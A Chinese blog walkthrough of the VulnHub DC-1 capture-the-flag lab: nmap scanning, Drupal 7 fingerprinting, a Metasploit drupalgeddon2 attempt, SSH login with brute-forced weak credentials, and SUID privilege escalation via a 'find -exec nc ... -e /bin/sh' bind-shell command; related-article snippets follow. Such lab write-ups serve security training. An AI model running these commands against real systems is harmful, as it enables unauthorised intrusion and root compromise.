VulnHub之dc1靶场(3)

最新推荐文章于 2024-05-03 11:58:47 发布
最新推荐文章于 2024-05-03 11:58:47 发布
阅读量209 收藏
点赞数
分类专栏: 渗透测试 文章标签: linux python shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/113867390
版权 
靶场信息:

地址:https://www.vulnhub.com/entry/dc-1-1,292/
难度:简单
目标:有五个标志,但是最终目标是在根目录的主目录中找到并读取该标志
运行:vm work

信息收集

nmap直接扫描网段存活主机
在这里插入图片描述
扫描常见端口

nmap  10.7.10.29  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 EST
Nmap scan report for 10.7.10.29
Host is up (0.0021s latency).
Not shown: 995 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
111/tcp open  rpcbind

Nmap done: 1 IP address (1 host up) scanned in 17.50 seconds

爆破弱口令,访问网页,扫描目录
在这里插入图片描述
收集指纹:

中间件:apache 2.2.22
语言:php 5.4.45
cms:drupal 7

漏洞复现

信息泄露

http://10.7.10.29/robots.txt在这里插入图片描述

远程代码执行漏洞

search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 10.7.10.29
run

我msf老是返回这个,呜呜呜
在这里插入图片描述

弱口令

回去查看爆破内容
在这里插入图片描述
直接登陆ssh在这里插入图片描述
登陆成功,但是/root目录没有权限
在这里插入图片描述

suid提权

尝试找到具有root权限的suid
在这里插入图片描述
发现为root可以利用
在这里插入图片描述
执行成功
在这里插入图片描述
首先执行find flag4.txt -exec nc -lvp 9999 -e /bin/sh \;
反弹shell到我的linux上
在这里插入图片描述
反弹成功,跳到root目录下在这里插入图片描述
参考文章:
https://blog.csdn.net/adminuil/article/details/101269264
https://blog.csdn.net/weixin_40860777/article/details/105118966

suid提权:https://blog.csdn.net/qq_36119192/article/details/84872644

p_utao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC靶场系列--DC1
BGiscool的博客
06-28 4847
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
vuln靶场——DC-1
最新发布
qq_54480761的博客
05-03 1383
我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录。典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块。登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3。进行登录,密码是之前我们自己替换的。
DC-1靶场
mlws1900的博客
03-21 1384
下载地址把桥接设置为nat模式,打开靶机的时候会提示几个错误,点击重试即可启动靶机,如下图所示即可。
DC1靶场 Drupal
m0_62438849的博客
03-02 1136
22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录。find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤。点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow。内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中。
Vulnhub系列之DC1靶场详解
weixin_54960572的博客
08-09 313
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC1_map_airtrafficcontrol_
10-02
3.Map值计算:根据定义的算法,对预处理后的数据进行处理,计算每个扇区的Map值。 4. 结果分析:可能包括统计分析,如平均Map值、最大/最小值、标准差等,以理解整体性能。 5. 可视化:利用MATLAB的图形功能,将Map...
海尔智能电视刷机数据 LE37A320 机编DC1EF000001-03 务必确认机编一致 强制刷机 整机USB升级主程序
02-28
3、待机 5 秒后,按遥控器待机键开机,机器会在开机过程中自动升级,此时观察指示灯变化:开机时,指示灯闪烁后保持常亮;7‐8 秒后灯灭;2‐3秒后灯亮并一直闪烁;待指示灯不闪烁并常亮时,升级完成并自动开机。 ...
DC-1渗透靶场实战速通版
saber的博客
12-01 876
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
Vulnhub-DC-1 靶机复现完整过程
Continuejww的博客
07-19 220
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec欢迎指正!
靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1164
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
vulnhub靶场】-dc1
weixin_43446292的博客
04-13 343
1、环境配置: kali:88.16.153.33 dc1:88.16.153.36 补充:kali需设为桥接模式,因为dc靶机打开需要登录,kali设为桥接模式后与dc1在同一个局域网内,可以在kali中扫描得知dc1的ip地址;dc1的下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 需要找到5个flag.txt 2、信息收集: 2.1 使用arp-scan -l,探测存活主机,也可使用nmap 88.16.153.33/24(较慢) 2.使用nmap查询开
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2495
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2512
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
DC-1靶场通关详解
qq_30889301的博客
05-20 176
dc-1入门教程
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 318
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值